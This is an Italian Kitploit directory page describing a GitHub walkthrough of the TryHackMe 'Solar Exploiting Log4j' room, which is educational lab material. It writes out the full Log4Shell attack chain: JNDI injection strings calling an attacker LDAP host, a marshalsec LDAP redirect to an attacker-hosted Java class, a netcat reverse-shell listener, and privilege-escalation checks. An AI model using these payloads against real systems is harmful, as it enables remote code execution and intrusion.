Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
solar-exploiting-log4j — Questo repository fornisce una guida dettagliata alla *stanza Solar Exploiting Log4j* su TryHackMe, incentrata sullo sfruttamento della critica vulnerabilità Log4Shell (CVE-2021-44228). Il progetto dimostra come gli attaccanti possano sfruttare meccanismi di logging non sicuri nelle applicazioni Java per ottenere l'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/lavanya2085/solar-exploiting-log4j
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneLab e Pratica
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Vedi Repository
5 mesi faNon ancora revisionato

Questo repository fornisce una guida dettagliata alla *stanza Solar Exploiting Log4j* su TryHackMe, incentrata sullo sfruttamento della critica vulnerabilità Log4Shell (CVE-2021-44228). Il progetto dimostra come gli attaccanti possano sfruttare meccanismi di logging non sicuri nelle applicazioni Java per ottenere l'esecuzione remota di codice.

Condividi

🔥 Solar Exploiting Log4j - Walkthrough di TryHackMe

📌 Stanza: Solar Exploiting Log4j

Piattaforma: TryHackMe Difficoltà: Media Argomento: Log4Shell (Vulnerabilità Log4j)


🧠 Obiettivo

Sfrutta la vulnerabilità Log4j (CVE-2021-44228) per ottenere l'esecuzione remota di codice e catturare le flag.


🛠️ Strumenti Utilizzati

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 Fase 1: Ricognizione

🔍 Scansione del Target

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 Risultati

  • Porte aperte: 80 (HTTP), altre in base alla stanza
  • Applicazione web con backend basato su Java

🌐 Fase 2: Enumerazione Web

  • Visita l'app web nel browser
  • Interagisci con gli input (campi di login/ricerca/header)
  • Cattura la richiesta usando Burp Suite

💥 Fase 3: Identificare la Vulnerabilità Log4j

La vulnerabilità Log4j consente l'iniezione JNDI:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}

Se l'input viene registrato nei log → la vulnerabilità esiste.


⚙️ Fase 4: Configurare il Listener

Avvia Netcat

root@kitploit:~
nc -lvnp 4444

Avvia il Server LDAP Malevolo (Esempio)

root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package

Esegui il server LDAP:

root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389

📡 Fase 5: Ospita la Payload

root@kitploit:~
python3 -m http.server 8000

Crea la classe Java malevola (Exploit.class)


🚀 Fase 6: Attiva l'Exploit

Inietta la payload nel campo vulnerabile:

root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}

💡 Usa header come:

  • User-Agent
  • X-Api-Version

🖥️ Fase 7: Ottenere una Reverse Shell

Una volta attivato:

  • Il target si connette al listener Netcat
  • Ottieni l'accesso alla shell

🔐 Fase 8: Escalation dei Privilegi (se necessario)

Controlla:

root@kitploit:~
sudo -l

Cerca:

  • Binari SUID configurati in modo errato
  • File scrivibili
  • Cron job

🚩 Fase 9: Cattura le Flag

root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt

🧾 Concetti Chiave Appresi

  • Log4Shell (CVE-2021-44228)
  • Iniezione JNDI
  • Esecuzione Remota di Codice (RCE)
  • Reverse Shell
  • Sfruttamento Web

Scarica lo strumento